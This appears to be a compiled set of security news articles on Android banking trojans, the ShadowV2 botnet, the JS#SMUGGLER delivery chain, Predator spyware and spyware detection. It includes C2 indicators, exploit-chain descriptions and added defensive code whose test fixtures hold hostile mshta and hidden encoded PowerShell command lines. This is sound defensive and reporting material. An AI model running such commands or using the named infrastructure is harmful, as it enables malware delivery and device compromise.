
New Android Malware SeedSnatcher and FvncBot Found By Experts


New Android malware found

Researchers have revealed details of two Android malware strains called SeedSnatcher and FvncBot. An upgraded version of ClayRat was also found in the wild.

About the malware 

FvncBot poses as a security app built by mBank and targets mobile banking users in Poland. The malware is written from scratch and differs from banking trojans such as ERMAC, whose source code has leaked.

According to Intel 471, the malware "implemented multiple features including keylogging by abusing Android's accessibility services, web-inject attacks, screen streaming and hidden virtual network computing (HVNC) to perform successful financial fraud."

Like the Albiriox banking malware, this trojan is shielded by a service called apk0day that Golden Crypt offers.

Attack tactic 

After the dropper app is launched, users are asked to download a Google Play component, supposedly to secure the app. In reality, this step deploys the malware through a session-based installation approach, which other actors also use to escape the accessibility restrictions on Android 13 and later.

According to Intel 471, "During the malware runtime, the log events were sent to the remote server at the naleymilva.it.com domain to track the current status of the bot." The malware then asks the victim for the accessibility services permission; once granted, it escalates its privileges and connects to an external server.

Malware capabilities 

FvncBot also triggers a text mode to analyze the device's screen layout and content, even where an app blocks screenshots by setting the FLAG_SECURE option.

Experts don't yet know how FvncBot is being distributed, but Android banking trojans commonly rely on third-party app stores and SMS phishing as distribution vectors.

According to Intel 471, "Android's accessibility service is intended to aid users with disabilities, but it also can give attackers the ability to know when certain apps are launched and overwrite the screen's display." 

The firm added that the sample was built to "target Polish-speaking users, it is plausible we will observe this theme shifting to target other regions or to impersonate other Polish institutions."


Beyond the immediate threat to banking and cryptocurrency users, the emergence of FvncBot, SeedSnatcher, and the upgraded ClayRat underscores a troubling evolution in mobile-malware design: an increasing shift toward “full-device takeover” rather than mere credential theft. By exploiting legitimate features, such as Android’s accessibility services, screen-streaming APIs, and overlay permissions, these trojans can invisibly hijack almost every function of a smartphone: logging keystrokes, intercepting SMS-delivered 2FA codes, capturing screen contents even when apps try to block screenshots, and executing arbitrary commands as though the real user were interacting with the device. 

This marks a new class of threat in which a compromised phone becomes a proxy tool for remote attackers: they don’t just steal data, they can impersonate the user, conduct fraudulent transactions, or monitor every digital activity. Hence, users worldwide, not only in Poland or crypto-heavy regions, must remain vigilant: the architecture these threats use is platform-wide, not region-specific, and could easily be repurposed for broader global campaigns.

ShadowV2 Botnet Activity Quietly Intensified During AWS Outage



A recently discovered wave of malicious activity has raised fresh concerns among cybersecurity analysts: ShadowV2, a fast-evolving strain of malware, is quietly assembling a global network of compromised devices. The operation is based heavily on Mirai's source code and is far more deliberate and calculated than previous variants, spanning more than 20 countries.

ShadowV2 was built by actors exploiting widespread misconfigurations in everyday Internet of Things hardware, an increasingly common weakness in modern digital ecosystems, with the aim of assembling a resilient, stealthy, and scalable botnet. FortiGuard Labs discovered the campaign during the Amazon Web Services disruption in late October, which the operators appear to have used as cover for their activity.

During the outage, the malware's activity spiked, which investigators interpret as a controlled test run rather than an opportunistic attack, according to the report. ShadowV2 was observed exploiting a wide range of flaws in devices from DD-WRT (CVE-2009-2765), D-Link (CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915), DigiEver (CVE-2023-52163), TBK (CVE-2024-3721), and TP-Link (CVE-2024-53375).

The campaign's reach across industries and geographies, coupled with its precise use of IoT flaws, is indicative of a maturing cybercriminal ecosystem, according to experts, one that is becoming increasingly adept at leveraging consumer-grade technology to stage sophisticated and coordinated attacks.

ShadowV2 exploited a variety of long-known IoT vulnerabilities, particularly in devices that manufacturers have already retired. Research by NetSecFish identified a number of vulnerabilities affecting D-Link products that have reached the end of their life cycle.

The most concerning issue is CVE-2024-10914, a command-injection flaw affecting end-of-life D-Link products. A related issue, CVE-2024-10915, was reported by NetSecFish in November 2024; no advisory existed for it at the time, and D-Link later confirmed that the affected devices had reached end of support and would remain unpatched.

The vendor responded to inquiries by updating an existing bulletin to include the newly assigned CVE and issuing a further announcement directly related to the ShadowV2 campaign, reminding customers that outdated hardware no longer receives security updates or maintenance.

During the same period, another vulnerability exploited by the botnet, CVE-2024-53375, was disclosed; it is reported to have been resolved through a beta firmware update. Taken together, these lapses illustrate that aging consumer devices remain fertile ground for large-scale malicious operations long after support has ended, because many of them are simply left running.

Based on the analysis of the campaign, ShadowV2's operators use a familiar yet effective distribution chain to spread as widely as possible. After exploiting one of the IoT vulnerabilities, the attackers have the device download a script named binary.sh from 81[.]88[.]18[.]108, the command server. Once the script is executed, it fetches the ShadowV2 payload (every sample carries the Shadow prefix), which resembles the well-known Mirai offshoot LZRD in many ways.

Analysis of the x86-64 build of the malware, shadow.x86_64, found that it initializes its configuration and attack routines from strings protected with a lightweight XOR encoding under a single-byte key (0x22), covering file system paths, HTTP headers, and User-Agent strings.
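The following is an added example, not Fortinet's or the malware authors' code, showing how an analyst recovers strings protected by the single-byte XOR scheme described above: it brute-forces all 256 keys, keeps the one whose output is printable and contains an expected configuration marker, and splits the result into NUL-terminated strings. The encoded table is constructed here by XOR-encoding plausible configuration strings with 0x22; it is not taken from a real sample, and the marker list is an assumption.

```python
"""Recover single-byte-XOR-obfuscated configuration strings (added example)."""
from __future__ import annotations

import string

# Bytes we accept as "text" in a decoded configuration table.
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; decoding and encoding are the same op."""
    return bytes(b ^ key for b in data)


def split_cstrings(blob: bytes) -> list[bytes]:
    """Split a decoded table on NUL terminators, dropping empty entries."""
    return [s for s in blob.split(b"\x00") if s]


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or NUL terminators."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in PRINTABLE or b == 0) / len(data)


def recover_key(blob: bytes,
                markers=(b"User-Agent", b"/proc/", b"HTTP/1.1")) -> int | None:
    """Try all 256 keys; accept the one that is mostly printable and contains
    at least one expected marker (markers are an analyst's assumption)."""
    best = None
    for key in range(256):
        decoded = xor_bytes(blob, key)
        score = printable_ratio(decoded)
        if score < 0.95 or not any(m in decoded for m in markers):
            continue
        if best is None or score > best[0]:
            best = (score, key)
    return best[1] if best else None


def decode_config(blob: bytes, key: int | None = None) -> dict:
    """Recover the key if not supplied and return the decoded string table."""
    if key is None:
        key = recover_key(blob)
        if key is None:
            raise ValueError("no single-byte key yields a plausible config table")
    strings = [s.decode("ascii") for s in split_cstrings(xor_bytes(blob, key))]
    return {"key": key, "strings": strings}


# Constructed sample: NUL-separated config strings XOR-encoded with 0x22.
_SAMPLE_PLAINTEXT = b"\x00".join([
    b"/proc/self/exe",
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    b"GET / HTTP/1.1",
    b"Connection: keep-alive",
]) + b"\x00"
SAMPLE_BLOB = xor_bytes(_SAMPLE_PLAINTEXT, 0x22)

if __name__ == "__main__":
    cfg = decode_config(SAMPLE_BLOB)
    print(f"recovered key: 0x{cfg['key']:02x}")
    for s in cfg["strings"]:
        print("  ", s)
```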

Once these parameters are decoded, the bot connects to its command-and-control server and waits for instructions to launch distributed denial-of-service attacks. Though modest in appearance, this streamlined design reflects a disciplined, purpose-built approach that allows deployment across diverse hardware without attracting immediate attention.

According to Fortinet, a deeper analysis of the malware—which uses XOR capabilities to encrypt configuration data and compact binaries—underscores that ShadowV2 shares many of the same features as the LZRD strain derived from Mirai. This allows ShadowV2 to minimize its visibility on compromised systems in a similar fashion. 

The infection sequence observed across multiple incidents follows a consistent pattern: attackers break into a vulnerable device, download the ShadowV2 payload from 81[.]88[.]18[.]108, and install it. Immediately after installation, the malware connects to its command server at silverpath[.]shadowstresser[.]info, joining a distributed network geared towards coordinated attacks.

Once installed, the malware takes up residence on the compromised device. Because it supports a wide range of DDoS techniques over UDP, TCP, and HTTP, the botnet is well suited to high-volume denial-of-service operations, including those associated with for-hire DDoS services, criminal extortion, and targeted disruption campaigns.

Researchers believe ShadowV2's initial activity window may have been chosen deliberately. A botnet can be tested early in its development during a major outage such as the AWS disruption of late October, because sudden traffic irregularities blend easily into the broader instability of the service.

By targeting both consumer-grade and enterprise-grade IoT systems, the operators appear to be building an attack fabric that is flexible, geographically diffuse, and capable of scaling rapidly even against strong defensive measures. While the observed activity was brief, analysts believe it served as a controlled proof-of-concept, and that a more expansive or destructive return could coincide with future widespread outages or high-profile international events.

In light of the campaign's implications, Fortinet has urged consumers and organizations to strengthen their defenses before similar operations occur. Beyond installing the latest firmware on all supported IoT and networking devices, the company emphasizes decommissioning end-of-life D-Link and other vendors' devices and disabling unnecessary internet-exposed features such as remote management and UPnP.

Additionally, IoT hardware should be isolated within segmented networks, outbound traffic and DNS queries should be monitored for anomalies, and strong, unique passwords should be enforced on every interface of every connected device. Together, these measures aim to reduce the attack surface that has allowed IoT-driven botnets such as ShadowV2 to flourish.

ShadowV2's observed activity has so far been limited to the short window of the Amazon Web Services outage, but researchers stress that it should serve as a timely reminder of the fragile state of global IoT security. The campaign underscores the continued importance of protecting internet-connected devices, updating firmware regularly, and monitoring network activity for unfamiliar or high-volume traffic patterns that may signal an early compromise.

Defenders will benefit from the extensive set of indicators of compromise that Fortinet has released to assist proactive threat hunting, further supporting what researcher Li has described as an ongoing reality in cybersecurity: IoT hardware remains one of the most vulnerable entry points for cybercriminals. Concern grew further when, just days after ShadowV2's suspected test run, Microsoft disclosed that Azure had defended against what it called the largest cloud-based DDoS attack ever recorded.

That attack, attributed to the Aisuru botnet, reached an unprecedented 15.72 Tbps and nearly 3.64 billion packets per second. Microsoft reported that its cloud DDoS protection systems absorbed the attack on October 24 without disrupting customer workflows.

Analysts suggest that the timing of the two incidents indicates a rapidly intensifying threat landscape in which adversaries are increasingly preparing to launch large-scale attacks, often without much advance notice. Analysts are pointing out that the ShadowV2 incident is not merely an isolated event, but should also be considered a preview of what a more volatile era of botnet-driven disruption might look like once the dust settles on these consecutive warning shots. 

The convergence of aging consumer hardware, incomplete patch ecosystems, and increasingly sophisticated adversaries means an overlooked device can become a launchpad for global-scale attacks. According to experts, real resilience will require more than reactive patching: embedding sustained visibility into networks, enforcing strict asset lifecycle management, and adopting architectures that limit the blast radius of inevitable compromises.

Consumers also play a crucial role in preventing botnets from spreading by replacing unsupported devices, enabling automatic updates, and regularly reviewing router and Internet-of-Things configurations, which collectively help to reduce the number of vulnerable nodes available to botnets. 

In the face of attackers who show a clear willingness to demonstrate their capabilities during times of widespread disruption, cybersecurity experts warn that proactive preparedness must replace event-driven preparedness as soon as possible. As they argue, the ShadowV2 incident is a timely reminder that strengthening the foundations of IoT security today is crucial to preventing far more disruptive campaigns tomorrow.

Researchers Warn of New JS#SMUGGLER Campaign Delivering NetSupport RAT Through Compromised Websites

Cybersecurity researchers have sounded the alarm about a new malware campaign called JS#SMUGGLER, which is using hacked websites to distribute the NetSupport remote access trojan (RAT). Securonix analysed the attack method, describing it as a multi-stage sequence designed to evade detection and grant attackers full control of infected systems. 

The chain begins with an obfuscated JavaScript loader that is injected into a compromised website. It then progresses to an HTML Application (HTA) file that launches encrypted PowerShell stagers through the Windows tool mshta.exe, followed by a PowerShell payload that downloads the main RAT. 

According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, “NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft and proxy capabilities.” 

There is currently no clear link to a specific threat group or country. The campaign targets enterprise users by redirecting them through infected websites, indicating broad targeting rather than a focused sector-specific effort. 

Securonix said the malware uses hidden iframes, scrambled JavaScript loaders and layered script execution. When a victim visits a compromised website, the injected script checks the device type. Mobile users are redirected to a full-screen iframe, while desktop users are sent to a second-stage malicious script. 

A tracking mechanism makes the payload fire only during the first visit to help avoid detection. The first-stage script builds the URL for the HTA payload at runtime and launches it using mshta.exe. The HTA file then runs a temporary PowerShell stager in memory. It disables visible window elements and removes itself afterwards to reduce digital traces. 

Once executed, the PowerShell payload downloads NetSupport RAT, giving the attacker remote control of the infected machine. Securonix called the campaign evidence of “a sophisticated and actively maintained malware framework.” 

The company advised defenders to use strong content security policies, script monitoring, PowerShell logging and restrictions on mshta.exe to detect similar activity. 
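As an added example of the PowerShell logging and mshta.exe monitoring advised above (not Securonix's tooling), the detection logic below scores process-creation events for the chain the article describes: mshta.exe loading a remote HTA, and PowerShell spawned by mshta.exe with a hidden window or an encoded command. The events are constructed in a Sysmon-like shape for this example; the field names, paths and URL are assumptions.

```python
"""Score process-creation events for the mshta.exe -> PowerShell stager chain."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Constructed process-creation record (Sysmon Event ID 1-like fields)."""
    pid: int
    image: str          # full path of the created process
    command_line: str
    parent_image: str


# PowerShell accepts unambiguous prefixes of its switches, so match on the
# leading letters rather than the full switch name.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
ENCODED_CMD = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
NO_PROFILE = re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return a severity score and the reasons that contributed to it."""
    reasons: list[str] = []
    score = 0
    image, parent = basename(ev.image), basename(ev.parent_image)
    if image in POWERSHELL_IMAGES and parent == "mshta.exe":
        score += 5
        reasons.append("powershell spawned by mshta.exe")
    if image == "mshta.exe" and REMOTE_URL.search(ev.command_line):
        score += 4
        reasons.append("mshta.exe loading a remote HTA")
    if HIDDEN_WINDOW.search(ev.command_line):
        score += 2
        reasons.append("hidden window requested")
    if ENCODED_CMD.search(ev.command_line):
        score += 2
        reasons.append("encoded command body")
    if NO_PROFILE.search(ev.command_line):
        score += 1
        reasons.append("profile loading disabled")
    return score, reasons


def detect(events, threshold: int = 4) -> list[dict]:
    """Return one alert per event whose score meets the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev.pid, "score": score, "reasons": reasons})
    return alerts


# Constructed events: a benign admin script, then the two stages of the chain.
SAMPLE_EVENTS = [
    ProcessEvent(1001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\inventory.ps1",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(1002, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://cdn.example.invalid/update.hta",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ProcessEvent(1003, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + "Q" * 40,
                 r"C:\Windows\System32\mshta.exe"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```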

Additional findings show the JavaScript dropper also writes two more files to the TEMP directory: 

  • svchost.js, which installs a .NET loader known as DarkTortilla 
  • adobe.js, which drops PHat.jar, an MSI installer with similar behavior 

In the attack, the loader decrypts and runs an embedded DLL for the Formbook malware, a keylogger and an information stealer. Persistence is achieved by placing the payload in the Windows startup folder or adding entries to the Windows Registry. Securonix noted, “The threat actors combine social engineering, heavy script obfuscation and advanced .NET evasion techniques to successfully compromise targets.” 

The researchers added that reflective loading allows the final malware to run without storing it as a traditional file, which makes investigation more difficult. The disclosure follows recent research from the same firm about CHAMELEON#NET, another multi-stage malware campaign used to deliver Formbook via phishing messages. That campaign targeted the National Social Security sector and used fake webmail login pages and compressed archives to lure victims.

Android Users Face New WhatsApp Malware Threat


Cybersecurity researchers at security firm Cleafy have issued a warning about a high-risk malware campaign aimed at Android users via WhatsApp messages that could jeopardize users' cryptocurrency wallets and bank information. The researchers track the threat as Albiriox, a newly emerging Android malware family marketed as malware-as-a-service (MaaS) on underground cybercrime forums.

Modus operandi 

The malware propagates through WhatsApp messages containing links to malicious websites that impersonate Google Play Store pages. Currently the lures impersonate a popular discount retail app, but both campaigns and targets could change quickly. Rather than receiving the app directly, victims are persuaded to submit their phone number on the premise that an installation link will be sent to them on WhatsApp.

After users tap the link and install the trojanised app, Albiriox is able to take full control of the compromised device. The malware performs overlay attacks against more than 400 cryptocurrency wallet and banking apps, displaying fake login screens on top of the legitimate apps to capture credentials as users type them.

Albiriox is an advanced, rapidly evolving malware family. It also features VNC-based remote access, which gives attackers direct control of infected devices. Initially the campaigns targeted Austrian users with German-language messages, but they are now broadening their reach. The malware is obfuscated with JSONPacker and tricks users into granting the "Install Unknown Apps" permission. When running, it contacts its command servers over unencrypted TCP and keeps the connection alive indefinitely, maintaining control through regular ping-pong heartbeat messages.

Mitigation tips

Security experts emphasize that users should never agree to install apps through phone number submission on websites. Any WhatsApp messages requesting app installations should be immediately deleted without clicking links. This distribution method represents exactly why Google is strengthening measures against sideloading, requiring app developers to register and verify their identities.

Cleafy highlights that Albiriox demonstrates the ongoing evolution and increasing sophistication of mobile banking threats. However, users can protect themselves effectively by following several key practices: only install apps from the official Google Play Store, ensure Play Protect is activated, and remain skeptical of any unsolicited installation requests received through messaging apps. 

The campaign highlights broader security concerns affecting WhatsApp and similar platforms, particularly as attackers combine social engineering with technical malware capabilities to compromise both devices and accounts.

Predator Spyware Targeting in Pakistan Exposed Through WhatsApp Link, Amnesty Report Reveals


A human rights attorney from Pakistan’s Balochistan region was recently sent a suspicious WhatsApp link from an unidentified number—an incident that Amnesty International says marks the first known targeting of a civil society actor in the country with Intellexa’s Predator spyware.

According to Amnesty, the URL displayed clear indicators of a "Predator attack attempt based on the technical behaviour of the infection server, and on specific characteristics of the one-time infection link which were consistent with previously observed Predator 1-click links." Pakistan has rejected the accusations, stating "there is not an iota of truth in it."

These revelations stem from a collaborative investigation involving Haaretz (Israel), Inside Story (Greece), and Inside IT (Switzerland). The findings are based on leaked company documents, internal communications, marketing materials, and training videos.

Intellexa, known for developing the mercenary spyware Predator, offers an advanced surveillance tool similar to NSO Group’s Pegasus. The product can clandestinely extract sensitive data from Android and iOS devices. Internal leaks indicate that Predator has also been branded under names such as Helios, Nova, Green Arrow, and Red Arrow.

To deploy the spyware, attackers commonly rely on malicious links sent through communication platforms. These links exploit undisclosed vulnerabilities through zero-click or one-click methods. If the intended target taps the link, a browser exploit in Google Chrome (Android) or Apple Safari (iOS) initiates access to the device, enabling the download of the main payload.

Google’s Threat Intelligence Group (GTIG) linked Intellexa to multiple zero-day exploits—either developed internally or purchased externally—including:
  • CVE-2025-48543 – Android Runtime UAF
  • CVE-2025-6554 – V8 Type Confusion (Chrome)
  • CVE-2023-41993 – WebKit JIT RCE
  • CVE-2023-41992 – Kernel IPC UAF
  • CVE-2023-41991 – Certificate validation bypass (Apple Security)
  • CVE-2024-4610 – Use-after-free in Arm GPU drivers
  • Several other historic V8 and Chrome vulnerabilities

In 2023, an iOS exploit chain deployed against individuals in Egypt combined CVE-2023-41993 with a framework called JSKit to run native code. GTIG noted the same exploit was used in a watering-hole attack linked to Russian state-backed hackers targeting Mongolian government websites, implying possible third-party supply of the exploits.

Google explained that "the JSKit framework is well maintained, supports a wide range of iOS versions, and is modular enough to support different Pointer Authentication Code (PAC) bypasses and code execution techniques." It can manually load and run Mach-O binaries directly from memory.

Once CVE-2023-41993 is abused, the attack escalates through CVE-2023-41991 and CVE-2023-41992 to escape Safari’s sandbox. This paves the way for a third-stage module known as PREYHUNTER. PREYHUNTER consists of:
  • Watcher: Monitors device behavior, ensuring the exploit remains undetected
  • Helper: Interfaces via a Unix socket to deploy hooks for keylogging, VoIP recording, and camera access

Intellexa also maintains a dedicated framework for exploiting Chrome’s V8 vulnerabilities, including CVE-2021-38003, CVE-2023-2033, CVE-2023-3079, CVE-2023-4762, and CVE-2025-6554, the last of which was reportedly used in Saudi Arabia in June 2025.

Once active on a device, Predator can extract data from messaging apps, calls, emails, location records, passwords, and screenshots. It can also activate the microphone for ambient audio recording and capture photos using the camera. All collected data is sent to servers inside the customer’s country.

Intellexa and several executives were sanctioned by the United States last year for creating and distributing the spyware, which authorities said undermines civil rights. Yet Predator infrastructure remains active in over a dozen countries, primarily in Africa, according to a June 2025 report by Recorded Future’s Insikt Group.

One of the most alarming disclosures is that Intellexa employees allegedly retained the ability to remotely access Predator systems hosted by its clients—including government installations—via TeamViewer.

Amnesty's Jurre van Bergen warned: "The fact that, at least in some cases, Intellexa appears to have retained the capability to remotely access Predator customer logs – allowing company staff to see details of surveillance operations and targeted individuals raises questions about its own human rights due diligence processes."

He added that if a spyware vendor is directly involved in operations, "it could potentially leave them open to claims of liability in cases of misuse and if any human rights abuses are caused by the use of spyware."

The report also outlines how Intellexa uses several delivery techniques that do not require targets to click malicious links. These include tools such as Triton (disclosed in 2023), Thor, and Oberon, along with remote delivery strategies that rely on internet or mobile networks.

Its three major strategic vectors include:
  • Mars and Jupiter – Network injection tools requiring cooperation between ISPs or mobile operators to perform adversary-in-the-middle (AitM) attacks using unencrypted HTTP traffic or intercepted domestic HTTPS traffic.
  • Aladdin – A zero-click technique that exploits mobile advertising by delivering a malicious ad that triggers infection automatically.

Amnesty noted: "The Aladdin system infects the target's phone by forcing a malicious advertisement created by the attacker to be shown on the target's phone."

Google confirmed it collaborated with partners to identify companies linked to Intellexa that operated within the ad ecosystem and to shut down those accounts.

Recorded Future separately identified two companies—Pulse Advertise and MorningStar TEC—suspected of managing ads tied to the Aladdin vector. The same report observed ongoing Predator infrastructure communication associated with customers in Saudi Arabia, Kazakhstan, Angola, and Mongolia.

Meanwhile, communication from Predator systems in Botswana, Trinidad and Tobago, and Egypt stopped around mid-2025. Recorded Future noted this could mean those governments ended their use of Predator—or alternatively shifted to new servers or infrastructure.

Intellexa Spyware Activity Appears to Slow in 2025, but New Research Suggests Broader Global Footprint


Despite U.S. sanctions imposed last year, the global footprint of Intellexa’s spyware operations may be larger and more elusive than previously believed, with researchers warning that shifting domain practices could be masking continued activity in 2025.

New research from Recorded Future’s Insikt Group reveals emerging evidence that Intellexa systems are currently being deployed in Iraq. The Record, which reported these findings, operates independently from Recorded Future.

Investigators also detected indicators “likely associated” with the use of Predator spyware by an entity connected to Pakistan. The report says it remains uncertain whether the intended targets were linked to Pakistan or if the operator was simply based within the country.

Intellexa, the creator of Predator spyware, has been at the center of global surveillance controversies, with its tools reportedly used against activists, journalists, and business leaders. Three former executives of the company are currently facing trial in Greece, where numerous victims of Predator surveillance have been identified.

The report also highlights ongoing Intellexa customer activity in Saudi Arabia, Kazakhstan, Angola, and Mongolia. Meanwhile, previous customers in Egypt, Botswana, and Trinidad and Tobago appear to have “ceased communication” since spring and summer — a shift that may reflect discontinued operations or a transition to new infrastructure.

A cluster linked to Mozambique, first identified earlier this year, continued functioning until at least late June 2025, according to the researchers.

This latest assessment builds on Insikt’s June report, which noted that Intellexa has repeatedly reconfigured its infrastructure in response to intensifying scrutiny — a strategy that complicates efforts to track its operations.

Researchers additionally uncovered several new companies suspected to be tied to Intellexa. Like many firms in the commercial spyware sector, Intellexa has long relied on shell companies and complex business networks to obscure its activities.

One newly identified company appears responsible for shipping Intellexa’s products to customers, while two more operate in the advertising sector and may be linked to a known infection vector that distributes spyware through online ads.

Two additional Intellexa-connected firms were traced to Kazakhstan and the Philippines, suggesting what researchers describe as an “expanding network footprint.”

Intellexa was added to the U.S. Commerce Department’s Entity List in July 2023, marking it as a threat to national security and foreign policy. In March 2024, the Commerce Department sanctioned founder Tal Jonathan Dilian, a former Israeli intelligence officer. Six months later, five more individuals and one affiliated entity were also sanctioned.

At the time, senior U.S. officials stressed the need for further action, pointing to Intellexa’s “opaque web of corporate entities, which are designed to avoid accountability.”

On Thursday, Amnesty International disclosed that Intellexa can remotely access Predator customer logs, allowing staff to view “details of surveillance operations and targeted individuals [which] raises questions about its own human rights due diligence processes,” according to Jurre van Bergen, Technologist at Amnesty’s Security Lab.

Van Bergen added: “If a mercenary spyware company is found to be directly involved in the operation of its product, then by human rights standards, it could potentially leave them open to claims of liability in cases of misuse and if any human rights abuses are caused by the use of spyware.”

New Android Malware ‘Sturnus’ Bypasses Encrypted Messaging Protections


Researchers at MTI Security have unearthed a particularly advanced strain of Android malware called Sturnus, which threatens to compromise the data and security of mobile phone owners. The malware reportedly employs advanced interception techniques to capture data and circumvent even the best application-level encryption, making the security features of popular messaging apps like WhatsApp, Telegram and Signal pointless. 

According to MTI, Sturnus does not need to crack encryption. Instead, it uses a simpler trick: it captures the screen once messages have been decrypted for viewing. By exploiting the device's ability to read on-screen content in real time, Sturnus can steal private message text without leaving a trace. This means scammers can access sensitive chats and potentially collect personally identifiable information (PII) or financial data shared in otherwise secure conversations.

In addition to message interception, Sturnus employs social engineering to steal credentials. The malware can display fake login screens that look like real banking apps and can be very convincing. Users who enter their login details on these fake screens inadvertently hand them to the attackers.

Sturnus can also simulate an Android system update screen, making the victim believe a normal update is being installed while malicious operations take place in the background. Perhaps most disturbingly, the researchers warn that Sturnus escalates its privileges by obtaining device administrator rights, which let it track unlock attempts and record the device PIN or password. Those same rights let it resist removal, so victims cannot easily uninstall the malware or regain control of their devices. 

The majority of Sturnus infections detected so far are clustered in Southern and Central Europe, according to ThreatFabric's telemetry. Such a restricted geography suggests that the operators are still testing the malware's capabilities and operating model before potentially launching a worldwide campaign. 

Experts recommend that Android users stay cautious: avoid downloading apps from unknown sources and be wary when an unfamiliar app asks for accessibility or overlay permissions. Sturnus also illustrates the growing sophistication of Android malware and the difficulty of keeping users safe in a landscape of continuously evolving mobile threats.

How To Tell If Spyware Is Hiding On Your Phone And What To Do About It

 



Your smartphone stores personal conversations, financial data, photos, and daily movements. This concentration of information makes it attractive to attackers who rely on spyware. Spyware is malicious software that pretends to be a useful app while silently collecting information. It can arrive through phishing messages, deceptive downloads, fake mobile tools, or through legitimate apps that receive harmful updates. Even monitoring tools designed for parents or employers can be misused to track someone without their knowledge.

Spyware exists in multiple forms. One common category is nuisanceware, which appears with legitimate apps and focuses on showing unwanted ads, altering browser settings, and gathering browsing data for advertisers. Although it does not usually damage the device, it still disrupts user activity and profits from forced ad interactions. Broader mobile spyware goes further by pulling system information, clipboard content, login credentials, and data linked to financial accounts. These threats rely on tricking users through harmful emails, unsafe attachments, social media links, fake text messages, or direct physical access.

A more aggressive class of spyware overlaps with stalkerware and can monitor nearly every action on a victim’s device. These tools read messages across different platforms, intercept calls, capture audio from the environment, trigger the camera, take screenshots, log keystrokes, track travel routes, and target social media platforms. They are widely associated with domestic abuse because they allow continuous surveillance of a person’s communication and location. At the highest end is commercial spyware sold to governments. Tools like Pegasus have been used against journalists, activists, and political opponents, although everyday users are rarely targeted due to the high cost of these operations.

There are several early signs of an attempted spyware install. Strange emails, unexpected social media messages, or SMS alerts urging you to click a link are often the first step. Attackers frequently use urgent language to pressure victims into downloading malicious files, including fake delivery notices or warnings framed as bank or tax office messages. Sometimes these messages appear to come from a trusted contact. Stalkerware may require physical access, which means a phone that briefly goes missing and returns with new settings or apps could have been tampered with.

Once spyware is installed, your phone may behave differently. Rapid battery drain, overheating, sudden reboots, location settings turning on without reason, or a sharp increase in mobile data use can indicate that data is being transmitted secretly. Some variants can subscribe victims to paid services or trigger unauthorized financial activity. Even harmless apps can turn malicious through updates, so new problems after installing an app deserve attention.

On Android devices, users can review settings that control installations from outside official stores. This option usually appears in Settings > Security > Allow unknown sources, although the exact location depends on the manufacturer. Another path to inspect is Apps > Menu > Special Access > Install unknown apps, which lists anything permitted to install packages. This check is not completely reliable because many spyware apps avoid appearing in the standard app view.

Some spyware hides behind generic names and icons to blend in with normal tools such as calculators, calendars, utilities, or currency converters. If an unfamiliar app shows up, running a quick search can help determine whether it belongs to legitimate software.

For iPhones that are not jailbroken, infection is generally harder unless attackers exploit a zero-day or an unpatched flaw. Risks increase when users delay firmware updates or do not run routine security scans. While both platforms can show signs of compromise, sophisticated spyware may remain silent.

Some advanced surveillance tools operate without leaving noticeable symptoms. These strains can disguise themselves as system services and limit resource use to avoid attention.

Removing spyware is challenging because these tools are designed to persist. Most infections can be removed, but some cases may require a full device reset or, in extreme scenarios, replacing the device. Stalkerware operators may also receive alerts when their access is disrupted, and a sudden halt in data flow can signal removal.

If removing spyware could put someone at physical risk, they should avoid tampering with the device and involve law enforcement or relevant support groups.

Several approaches can help remove mobile spyware:

1. Run a malware scan: Reputable mobile antivirus tools can detect many common spyware families, though they may miss advanced variants.

2. Use dedicated removal tools: Specialized spyware removal software can help, but it must only be downloaded from trusted sources to avoid further infection.

3. Remove suspicious apps: Reviewing installed applications and deleting anything unfamiliar or unused may eliminate threats.

4. Check device administrator settings: Spyware may grant itself administrator rights. If such apps cannot be removed normally, a factory reset might be necessary.

5. Boot into Safe Mode: Safe Mode disables third-party apps temporarily, making removal easier, though advanced spyware may still persist.

6. Update the operating system: Patches often close security gaps that spyware relies on.
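Step 4 above, and the Sturnus write-up earlier on this page, both come down to two grants that Android malware needs: an enabled accessibility service and device administrator rights. The following script, an added example and not part of the original article, triages three `adb shell` outputs for those grants and cross-references them with how each package was installed. The three inputs are constructed samples shaped like the real output of `adb shell settings get secure enabled_accessibility_services`, `adb shell dumpsys device_policy` and `adb shell pm list packages -3 -i`; the package names are fictitious, the `dumpsys` layout varies between Android versions (so the parser is tolerant), and the allowlist of expected accessibility services is an assumption you would adapt to the device.

```javascript
// Added example: triage adb output for accessibility-service and device-admin grants.
// Inputs are constructed samples modelled on real `adb shell` output.

const A11Y_SETTING = 'com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:com.securebank.protect/.AccService';

const DEVICE_POLICY = `Current Device Policy Manager state:
  Enabled Device Admins (User 0, provisioningState: 0):
    com.securebank.protect/.AdminReceiver:
      uid=10231
      policies:
        limit-password
        watch-login
        force-lock
        wipe-data
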